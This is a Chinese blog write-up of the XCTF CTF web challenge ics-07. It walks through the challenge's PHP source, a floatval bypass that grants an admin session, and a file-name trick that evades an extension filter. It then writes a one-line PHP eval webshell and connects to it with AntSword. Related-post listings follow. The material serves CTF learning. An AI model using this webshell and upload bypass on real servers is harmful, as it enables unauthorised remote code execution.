[XCTF]ics-07

最新推荐文章于 2023-01-29 20:46:28 发布
最新推荐文章于 2023-01-29 20:46:28 发布
阅读量1.1k 收藏
点赞数
分类专栏: 渗透测试 攻防世界 文件上传 文章标签: PHP代码审计 中间件解析漏洞 上传漏洞 安全防护 工控云系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/120047889
版权

工控云管理系统项目管理页面解析漏洞

 

打开链接,一个工控云管理系统,随意点击旁边的菜单,发现只有云平台项目管理中心可以进入

初始页面只有一个,可以找到一个view-source,点进去可以看到源码

考点:php代码审计、中间件解析漏洞、上传一句话木马连接

PHP代码审计

代码一共分为三部分

第一部分:提交的get参数page不为index.php即可

<?php
    session_start();//在用户登陆成功后,将用户特定标识存储到 session 会话中
    if (!isset($_GET[page])) {//检测page是否已设置且非空。
      show_source(__FILE__);//返回被高亮处理的代码,文件
      die();//输出并退出当前脚本
    }
    if (isset($_GET[page]) && $_GET[page] != 'index.php') {//要求提交的get参数page不为空且字符串不为index.php,则跳转flag.php
      include('flag.php');//include包含并执行
    }else {
      header('Location: ?page=flag.php');
    }
    ?>

第二部分:之后会得到一admin的session,通过post传入con与file两个参数,保存至/uploaded/backup/xxx文件名下

 <?php
     if ($_SESSION['admin']) {//session为admin
       $con = $_POST['con'];//post传入con和file
       $file = $_POST['file'];
       $filename = "backup/".$file;//文件名为backup/file

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');//上传成功后,在uploaded目录,创建文件,
并将con的内容写入/backup内,实际路径就是:uploaded/backup/xxx.xxx
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

第三部分:获取一个id参数, 并且id不为1,且最后一位等于9。
这里用到了floatval这个函数,floatval 函数用于获取变量的浮点值,但是floatval在遇到字符时会截断后面的部分,所以可以构造id=1gy9来满足第一个if条件,if条件满足条件时,即可使得$result变量为TRUE,查询正确,就会得到一个admin的session了

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {//floatval()函数,返还它其变量的浮点值
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

floatval()函数使用代码示例

<?php

$var = '47.129mln';

$float_value = floatval($var);

echo $float_value;

?>

输出:47.129

这里使用HackBar工具

先满足1,3部分条件

写入一句话

con=<?php @eval($_POST[password]);?>&file=1.php/cmd.php/..

使用蚁剑连接,密码为password,并且获取目录内的flag

bbb07
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 3767
题目描述:其他破坏者会利用工控管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
攻防世界xctf writeup ics-07
qq_43370221的博客
04-20 691
文章目录xctf_writeup_ics-07审计代码审计写入文件代码构造最后的payload菜刀连接的到webshell xctf_writeup_ics-07 审计代码 浏览页面 发现了view-source链接 ,接下来审计代码 if (!isset($_GET[page])) { show_source(__FILE__); die(); }...
isc07
xiaoqi199915的博客
06-02 356
工控管理系统项目管理页面解析漏洞 进入之后有一个view-source 进入 http://124.126.19.106:39693/view-source.php 审查源码 第一段 参数page存在且其值不等于index.php,才会包含flag.php 第二段 首先SESSION[′admin′],将_SESSION['admin'],将S​ESSION[′admin′],将con的内容写入到$file,但文件后缀名不可以为.php3/4/5/6/7/t/html 第三段 KaTeX parse er
XCTFics-07
小白渣的博客
10-28 2288
三种解题方法 (1) 步骤 1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。 2.绕过要注意的三个点为: ​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1 ​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9 ​ (3)Mysql查询结果限制,id不能过大, 3.构建后exp为http:...
XCTF-ics-07
臭nana的博客
12-17 453
题目描述:工控管理系统项目管理页面解析漏洞 打开题目网址,点击项目管理 进来之后,发现页面下方有一个view-source 点击之后得到页面源码 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title&...
Web安全攻防世界09 ics-07XCTF
weixin_42789937的博客
01-29 995
Web安全攻防世界09 ics-07XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
XCTF-高手进阶区:ics-07
1stPeak's Blog
04-14 596
题目: 发现view-source <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start...
XCTF:ics-07
羽的博客
09-09 352
看源码。 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else { header('Location: ?pag...
xctf ics-02
weixin_51861515的博客
11-07 276
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
[xctf]ics-07攻防世界(代码审计 + 正则 + 文件上传)
qq_37301470的博客
11-20 484
Ics -07 攻防世界 代码审计 + 正则 + 文件上传 + 登录session 源代码已经给出 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start(); if (!iss
攻防世界:XCTFics-07
末初的CSDN博客
03-13 558
点击view-source,源码如下: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_st...
ICS-07
weixin_52921802的博客
12-16 515
输入、输出 本章输入设备选择键盘,输出设备选择显示器 输入、输出的基本概念 设备寄存器(decice register):即使最简单的I/O设备,也至少包含两个寄存器: 一个用来保存跟计算机之间传输的数据; 另一个用来指示当前设备的状态信息。 内存映射I/O与专用I/O指令 指令访问I/O设备寄存器时,需要明确指明目标寄存器。通常有两种实现方法 采用专门的I/O指令来访问,即专用I/O指令 采用内存操作指令来完成I/O操作,即内存映射I/O 专用I/O指令就是设计好的操作码来确定其行为
ics-07
CN天狼
03-01 134
ics-07
Web(ics-07)
m0_56010012的博客
03-23 3152
题目描述:工控管理系统项目管理页面解析漏洞 查看view-source下三段代码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php');
攻防世界 ics-07
CyhDl666的博客
02-24 487
ics-07 hint:工控管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
攻防世界----ics-07
qq_44418229的博客
07-26 438
攻防世界---ics-07 分析源码+正则
ics-07—CTF
qq_40646572的博客
04-16 2233
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话中获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
【攻防世界WEB】难度五星15分进阶题:ics-07
07-24 590
【攻防世界WEB】五星15分
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4590
工控管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
web-ics-05
最新发布
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息,我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目,要求读取文件并进行一些操作,同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值